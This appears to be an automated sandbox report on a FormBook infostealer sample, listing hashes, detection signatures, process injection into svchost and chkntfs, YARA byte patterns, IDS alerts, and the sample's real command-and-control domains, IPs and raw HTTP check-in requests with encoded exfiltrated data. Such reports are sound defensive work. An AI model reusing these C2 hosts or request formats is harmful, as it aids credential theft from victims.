
Windows Analysis Report
p4LNUqyKZM.exe

Overview

General Information

Sample name: p4LNUqyKZM.exe (renamed because the original name is a hash value)
Original sample name: 416e839248fccc61a17a02d1513127612b89425f45ddf603800f1def225adb07.exe
Analysis ID: 1503359
MD5: 4214be98801c44f69b60490a3321e940
SHA1: df33635a4f458821d10ce62860a043a960ced09f
SHA256: 416e839248fccc61a17a02d1513127612b89425f45ddf603800f1def225adb07

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • p4LNUqyKZM.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\p4LNUqyKZM.exe" MD5: 4214BE98801C44F69B60490A3321E940)
    • svchost.exe (PID: 2656 cmdline: "C:\Users\user\Desktop\p4LNUqyKZM.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • SCsLZYqthBle.exe (PID: 2412 cmdline: "C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • chkntfs.exe (PID: 3444 cmdline: "C:\Windows\SysWOW64\chkntfs.exe" MD5: A9B42ED1B14BB22EF07CCC8228697408)
          • SCsLZYqthBle.exe (PID: 1852 cmdline: "C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4544 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source / Rule / Description / Author / Strings):

Source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp
  Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown; Strings:
  • 0x2c2e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1433f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp
  Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown; Strings:
  • 0x2c2e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1433f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Yara matches in unpacked PE files (Source / Rule / Description / Author / Strings):

Source: 1.2.svchost.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 1.2.svchost.exe.400000.0.unpack
  Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown; Strings:
  • 0x2e8e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16942:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 1.2.svchost.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 1.2.svchost.exe.400000.0.raw.unpack
  Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown; Strings:
  • 0x2f6e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17742:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\p4LNUqyKZM.exe", CommandLine: "C:\Users\user\Desktop\p4LNUqyKZM.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\p4LNUqyKZM.exe", ParentImage: C:\Users\user\Desktop\p4LNUqyKZM.exe, ParentProcessId: 5480, ParentProcessName: p4LNUqyKZM.exe, ProcessCommandLine: "C:\Users\user\Desktop\p4LNUqyKZM.exe", ProcessId: 2656, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\p4LNUqyKZM.exe", CommandLine: "C:\Users\user\Desktop\p4LNUqyKZM.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\p4LNUqyKZM.exe", ParentImage: C:\Users\user\Desktop\p4LNUqyKZM.exe, ParentProcessId: 5480, ParentProcessName: p4LNUqyKZM.exe, ProcessCommandLine: "C:\Users\user\Desktop\p4LNUqyKZM.exe", ProcessId: 2656, ProcessName: svchost.exe
Suricata IDS alerts:

Timestamp                        | SID     | Severity | Source Port | Destination Port | Protocol | Classtype
2024-09-03T12:47:03.449238+0200  | 2855464 | 1        | 49751       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:48:22.027549+0200  | 2855464 | 1        | 49767       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:47:05.845810+0200  | 2855464 | 1        | 49752       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:47:16.668340+0200  | 2855464 | 1        | 49755       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:46:24.686828+0200  | 2855464 | 1        | 49739       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:48:08.668881+0200  | 2855464 | 1        | 49763       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:46:22.131705+0200  | 2855464 | 1        | 49738       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:48:11.402820+0200  | 2855464 | 1        | 49764       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:48:25.385798+0200  | 2855464 | 1        | 49768       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:46:36.128432+0200  | 2855464 | 1        | 49743       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:46:19.589102+0200  | 2855464 | 1        | 49737       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:48:33.766377+0200  | 2855464 | 1        | 49770       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:47:14.122963+0200  | 2855464 | 1        | 49754       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:48:19.457377+0200  | 2855464 | 1        | 49766       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:47:39.022061+0200  | 2855464 | 1        | 49759       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:47:41.568823+0200  | 2855464 | 1        | 49760       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:48:06.104368+0200  | 2855464 | 1        | 49762       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:47:36.459420+0200  | 2855464 | 1        | 49758       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:47:00.593340+0200  | 2855464 | 1        | 49750       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:46:33.583797+0200  | 2855464 | 1        | 49742       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:48:36.350756+0200  | 2855464 | 1        | 49771       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:47:19.220268+0200  | 2855464 | 1        | 49756       | 80               | TCP      | A Network Trojan was detected
2024-09-03T12:46:38.881573+0200  | 2855464 | 1        | 49744       | 80               | TCP      | A Network Trojan was detected


AV Detection

Source: p4LNUqyKZM.exe; ReversingLabs: Detection: 42%
Source: p4LNUqyKZM.exe; Virustotal: Detection: 37%
Source: Yara match; File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: p4LNUqyKZM.exe; Joe Sandbox ML: detected
Source: p4LNUqyKZM.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000001.00000002.1885469349.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1852804747.000000000341A000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000002.3535610034.0000000000638000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SCsLZYqthBle.exe, 00000002.00000002.3535229764.00000000001BE000.00000002.00000001.01000000.00000004.sdmp, SCsLZYqthBle.exe, 00000007.00000000.1955287762.00000000001BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: p4LNUqyKZM.exe, 00000000.00000003.1693769873.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, p4LNUqyKZM.exe, 00000000.00000003.1694275848.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885612260.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885612260.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1797175135.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1795600663.0000000003700000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536314646.000000000461E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536314646.0000000004480000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1885366615.000000000412D000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1891266886.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: p4LNUqyKZM.exe, 00000000.00000003.1693769873.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, p4LNUqyKZM.exe, 00000000.00000003.1694275848.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1885612260.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885612260.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1797175135.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1795600663.0000000003700000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000003.00000002.3536314646.000000000461E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536314646.0000000004480000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1885366615.000000000412D000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1891266886.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: chkntfs.pdb source: svchost.exe, 00000001.00000002.1885469349.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1852804747.000000000341A000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000002.3535610034.0000000000638000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: chkntfs.exe, 00000003.00000002.3536613638.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3535509329.0000000000798000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000000.1955867133.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2174561801.00000000365AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000003.00000002.3536613638.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3535509329.0000000000798000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000000.1955867133.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2174561801.00000000365AC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\p4LNUqyKZM.exe; Code function: 0_2_009EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_009EDBBE
Source: C:\Users\user\Desktop\p4LNUqyKZM.exe; Code function: 0_2_009F68EE FindFirstFileW,FindClose,0_2_009F68EE
Source: C:\Users\user\Desktop\p4LNUqyKZM.exe; Code function: 0_2_009F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_009F698F
Source: C:\Users\user\Desktop\p4LNUqyKZM.exe; Code function: 0_2_009ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009ED076
Source: C:\Users\user\Desktop\p4LNUqyKZM.exe; Code function: 0_2_009ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009ED3A9
Source: C:\Users\user\Desktop\p4LNUqyKZM.exe; Code function: 0_2_009F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009F9642
Source: C:\Users\user\Desktop\p4LNUqyKZM.exe; Code function: 0_2_009F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009F979D
Source: C:\Users\user\Desktop\p4LNUqyKZM.exe; Code function: 0_2_009F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_009F9B2B
Source: C:\Users\user\Desktop\p4LNUqyKZM.exe; Code function: 0_2_009F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_009F5C97
Source: C:\Windows\SysWOW64\chkntfs.exe; Code function: 3_2_004DC750 FindFirstFileW,FindNextFileW,FindClose,3_2_004DC750
Source: C:\Windows\SysWOW64\chkntfs.exe; Code function: 3_2_004DC886 FindFirstFileW,FindNextFileW,FindClose,3_2_004DC886
Source: C:\Windows\SysWOW64\chkntfs.exe; Code function: 4x nop then xor eax, eax 3_2_004C9B00
Source: C:\Windows\SysWOW64\chkntfs.exe; Code function: 4x nop then mov ebx, 00000004h 3_2_042D04DE

Networking

Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 162.0.239.141:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 199.59.243.226:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 162.0.239.141:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 199.59.243.226:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 154.23.184.240:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 154.23.184.240:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 199.59.243.226:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 154.23.184.240:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 161.97.168.245:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 199.59.243.226:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 199.59.243.226:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 199.59.243.226:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 5.144.130.52:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 161.97.168.245:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 5.144.130.52:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 162.0.239.141:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 161.97.168.245:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 218.247.68.184:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 218.247.68.184:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 5.144.130.52:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 3.33.130.190:80
Source: DNS query: www.asian-massage-us.xyz
Source: Joe Sandbox View; IP Address: 199.59.243.226
Source: Joe Sandbox View; IP Address: 154.23.184.240
Source: Joe Sandbox View; ASN Name: HOSTIRAN-NETWORKIR
Source: Joe Sandbox View; ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View; ASN Name: WEST263GO-HKWest263InternationalLimitedHK
Source: Joe Sandbox View; ASN Name: BODIS-NJUS
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
Source: C:\Users\user\Desktop\p4LNUqyKZM.exe; Code function: 0_2_009FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_009FCE44
Source: global traffic; HTTP traffic detected. All eight GET requests below carried the same headers:
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
Request lines and Host headers:
  GET /xsf1/?3L7=cfJLLBshpRPDzp&TJY8=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg= HTTP/1.1 (Host: www.clientebradesco.online)
  GET /12ts/?TJY8=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&3L7=cfJLLBshpRPDzp HTTP/1.1 (Host: www.myim.cloud)
  GET /ftud/?3L7=cfJLLBshpRPDzp&TJY8=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU= HTTP/1.1 (Host: www.d55dg.top)
  GET /mkan/?TJY8=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&3L7=cfJLLBshpRPDzp HTTP/1.1 (Host: www.fineg.online)
  GET /kc69/?TJY8=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&3L7=cfJLLBshpRPDzp HTTP/1.1 (Host: www.asian-massage-us.xyz)
  GET /ifo8/?TJY8=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&3L7=cfJLLBshpRPDzp HTTP/1.1 (Host: www.aflaksokna.com)
  GET /p6o9/?TJY8=Zmr/YL1wBhH5EvOYa+lfR7FMwZSqpeTcexp1DhQNUfR7ECek+Jud5GyO11J5h9itVrdZedwNG4+zKYxY7NG/xiBUzJxWpUvsREBgoFXOyFDTB09pGlr6B+k=&3L7=cfJLLBshpRPDzp HTTP/1.1 (Host: www.qiluqiyuan.buzz)
  GET /45sz/?3L7=cfJLLBshpRPDzp&TJY8=wkQ2jmS8yMxgRlKbDRWyNF0e8S7IapgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x9uDDBeomzG9S18EgEY/2fSLTGleisJLGxPY= HTTP/1.1 (Host: www.omexai.info)
Source: global traffic; DNS traffic detected: DNS query: www.clientebradesco.online
Source: global traffic; DNS traffic detected: DNS query: www.myim.cloud
Source: global traffic; DNS traffic detected: DNS query: www.d55dg.top
Source: global traffic; DNS traffic detected: DNS query: www.arlon-commerce.com
Source: global traffic; DNS traffic detected: DNS query: www.fineg.online
Source: global traffic; DNS traffic detected: DNS query: www.asian-massage-us.xyz
Source: global traffic; DNS traffic detected: DNS query: www.thriveline.online
Source: global traffic; DNS traffic detected: DNS query: www.aflaksokna.com
Source: global traffic; DNS traffic detected: DNS query: www.esistiliya.online
Source: global traffic; DNS traffic detected: DNS query: www.qiluqiyuan.buzz
Source: global traffic; DNS traffic detected: DNS query: www.omexai.info
Source: global traffic; DNS traffic detected: DNS query: www.dfbio.net
            Source: unknownHTTP traffic detected: POST /12ts/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usConnection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 201Host: www.myim.cloudOrigin: http://www.myim.cloudReferer: http://www.myim.cloud/12ts/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36Data Raw: 54 4a 59 38 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 62 51 39 67 56 68 57 45 54 6a 2f 44 65 48 31 73 63 6e 64 34 69 4d 45 48 7a 73 4e 64 52 65 38 6a 46 7a 55 46 42 2f 77 55 5a 57 38 52 6a 6f 30 38 38 55 68 34 36 30 4b 67 73 32 39 38 68 39 67 6f 7a 43 73 65 69 32 4f 6b 42 5a 5a 71 69 71 6f 49 48 71 65 69 77 77 6e 31 6f 44 46 51 35 51 70 70 4c 4b 67 42 66 64 42 32 64 78 51 68 7a 44 56 6f 36 31 6b 56 42 68 76 32 71 56 52 65 67 4e 6a 6b 66 36 4e 58 4f 2f 6c 56 37 69 6b 6d 62 4f 55 4d 52 74 39 2f 51 51 2f 65 32 4f 75 31 73 71 4c 34 32 73 44 31 4d 4c 79 72 68 61 32 44 70 76 78 6f 4f 44 46 5a 32 51 3d 3d Data Ascii: TJY8=SIczoioFeEyVbQ9gVhWETj/DeH1scnd4iMEHzsNdRe8jFzUFB/wUZW8Rjo088Uh460Kgs298h9gozCsei2OkBZZqiqoIHqeiwwn1oDFQ5QppLKgBfdB2dxQhzDVo61kVBhv2qVRegNjkf6NXO/lV7ikmbOUMRt9/QQ/e2Ou1sqL42sD1MLyrha2DpvxoODFZ2Q==
